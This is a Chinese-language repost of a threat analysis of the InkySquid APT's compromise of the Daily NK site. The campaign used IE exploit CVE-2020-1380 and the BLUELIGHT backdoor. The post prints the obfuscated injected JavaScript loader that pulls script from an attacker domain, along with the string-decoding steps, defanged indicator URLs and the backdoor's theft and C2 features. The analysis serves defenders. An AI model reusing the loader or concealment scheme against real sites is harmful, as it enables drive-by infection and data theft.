朝鮮InkySquid APT組織利用瀏覽器漏洞感染受害者。

2021年4月，Volexity研究人員識(shí)別出了通過(guò)www.dailynk[.]com網(wǎng)站加載到惡意子域名的jquery[.]services可疑代碼。加載惡意代碼的URL包括：

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1 hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

這些URL指向的是Daily NK網(wǎng)站使用的合法文件，但是內(nèi)容被攻擊者修改了，其中包含重定向用戶從攻擊者控制的域名jquery[.]services加載惡意JS。攻擊者控制的代碼只加入了很短的時(shí)間就被移除了，使得攻擊者活動(dòng)的識(shí)別變得非常困難。

CVE-2020-1380

Volexity研究人員發(fā)現(xiàn)攻擊者利用的首個(gè)漏洞是CVE-2020-1380，一個(gè)IE 0 day漏洞利用。攻擊者在Daily NK網(wǎng)站的下述合法文件中加入了一行代碼：

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

加入到Daily NK網(wǎng)站的混淆的代碼如下：

function vgrai(){var e=document.createElement("script");e.src=fecet("w6625I>>7x=y37t4;=5t48xrt5>4t52105x8t<t:6t0s=/x0=y5",15),document.head&&document.head.appendChild(e)}function vdgie(){const e=window.navigator.userAgent,t=e.indexOf("rv:11.0 "),i=e.indexOf("Trident/");return t>0||i>0}vdgie()&&vgrai();

加入以上代碼后，如果用戶用IE來(lái)訪問(wèn)Daily NK，頁(yè)面就會(huì)從以下URL加載其他的JS文件：

hxxps://ui.jquery[.]services/responsive-extend.min.js

請(qǐng)求時(shí)，由于有正確的IE User-Agent，主機(jī)就會(huì)作為其他混淆的JS代碼。初始重定向后，攻擊者會(huì)選擇將惡意代碼隱藏在合法代碼中。在本例中，攻擊者使用了"bPopUp" JS庫(kù)。這一選擇具有2個(gè)結(jié)果：

?分析JS的人可能會(huì)誤認(rèn)為其是合法的，因?yàn)榇蠖鄶?shù)代碼都是非惡意的；

?識(shí)別惡意JS代碼的自動(dòng)化解決方案也可能會(huì)誤認(rèn)為這些代碼是非惡意的，因?yàn)榇a大部分可以與合法庫(kù)內(nèi)容匹配。

攻擊者使用的漏洞利用代碼中還包含許多混淆在變量中的字符串，以使其顯得像合法的SVG內(nèi)容。攻擊者隱藏字符串的示例如圖1所示：

圖 1. SVG變量中混淆的字符串

為解密這些字符串，需要執(zhí)行以下步驟：

?通過(guò)M43.2字符串將path變量中的d屬性中的數(shù)據(jù)分割開(kāi)來(lái)；

?將分割出的數(shù)據(jù)的每個(gè)元素通過(guò)空格符再次分割，會(huì)得到一個(gè)數(shù)字列表；

?將這些數(shù)字轉(zhuǎn)成整數(shù)；

?如果整數(shù)大于30，就減去17，并加到生成的字符串中。如果整數(shù)小于等于30，就丟棄該數(shù)字。

總的來(lái)看，一共使用了3個(gè)假的SVG對(duì)象。一旦這些對(duì)象中的字符串替換為JS，識(shí)別漏洞利用就很容易了。解密和替換后的代碼如圖2所示：

圖 2. CVE-2020-1380實(shí)現(xiàn)

代碼對(duì)應(yīng)的是TrendMicro研究人員發(fā)布的CVE-2020-1380漏洞PoC代碼。

成功利用后，JS會(huì)使用相同的方法來(lái)解密最終的SVG變量，最終生成一個(gè)十六進(jìn)制編碼的Cobalt Strike stager，然后解碼和執(zhí)行。本例中，下載其他shellcode的URL包括：

?hxxps://ui.jquery[.]services/swipeout.min.js

?hxxps://ui.jquery[.]services/swipeout.min.css

?hxxps://ui.jquery[.]services/slider.min.css

BLUELIGHT

在另一個(gè)樣本中，攻擊者使用jquery[.]services子域名來(lái)存放一個(gè)新的惡意軟件家族。文件存放位置為：

hxxps://storage.jquery[.]services/log/history

history文件是一個(gè)XOR編碼的定制惡意軟件副本，惡意軟件開(kāi)發(fā)者和Volexity都將其命名為BLUELIGHT。命名依據(jù)是惡意軟件PDB字符串：

E:\Development\BACKDOOR\ncov\Release\bluelight.pdb

BLUELIGHT是Cobalt Strike成功傳播后的第二個(gè)payload。BLUELIGHT惡意軟件使用不同的云服務(wù)提供商作為C2。惡意軟件樣本使用Microsoft Graph API進(jìn)行C2操作。最開(kāi)始的時(shí)候，BLUELIGHT使用硬編碼的參數(shù)來(lái)進(jìn)行oauth 2 token認(rèn)證。客戶端認(rèn)證后，BLUELIGHT就會(huì)在OneDrive appfolder文件夾下創(chuàng)建子目錄，創(chuàng)建的子目錄名有：

logo

normal

background

theme

round

文件夾和子目錄建立后，就會(huì)以JSON對(duì)象的格式來(lái)收集以下信息：

用戶名

計(jì)算機(jī)名

操作系統(tǒng)版本

Web IP

默認(rèn)接口的本地IP

本地時(shí)間

植入的二進(jìn)制文件是32位還是64位

進(jìn)程SID授權(quán)登記

進(jìn)程文件名

安裝的反病毒軟件列表

受感染的機(jī)器是否運(yùn)行虛擬機(jī)

這些數(shù)據(jù)會(huì)經(jīng)過(guò)XOR編碼為一個(gè)二進(jìn)制blob并上傳。所有上傳的文件都會(huì)以.jpg作為擴(kuò)展，不同的子目錄和文件名表明不同類型的命令數(shù)據(jù)。

C2循環(huán)在初始上傳偵查數(shù)據(jù)后開(kāi)始，大約30秒循環(huán)一次。前5分鐘內(nèi)，每個(gè)循環(huán)會(huì)截圖，并以時(shí)間戳作為文件名上傳到normal子目錄。5分鐘后，截圖每隔5分鐘上傳一次。

在每個(gè)循環(huán)中，客戶端會(huì)通過(guò)美劇background子目錄來(lái)查詢新的命令。文件名表明要執(zhí)行的命令，文件的內(nèi)容提供命令相關(guān)的進(jìn)一步信息。支持的命令包括：

執(zhí)行和下載shellcode

下載和啟動(dòng)可執(zhí)行文件，然后上傳程序輸出

獲取IE、Edge、Chrome、Naver Whale等支持的瀏覽器中的cookie和密碼數(shù)據(jù)庫(kù)

遞歸檢索路徑和上傳文件元數(shù)據(jù)；

產(chǎn)生一個(gè)進(jìn)程來(lái)遞歸檢索路徑，以zip文件形式上傳文件；

中止文件上傳線程。

卸載。

命令文件在處理后會(huì)被刪除，大多數(shù)命令生成的文件會(huì)上傳到round目錄。但zip upload會(huì)使用theme子目錄。

最后，有在學(xué)網(wǎng)絡(luò)安全的朋友需要資料的可以找我哦！！！

總結(jié)

以上是生活随笔為你收集整理的【安全漏洞】朝鲜InkySquid APT组织是怎么利用浏览器漏洞感染受害者的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。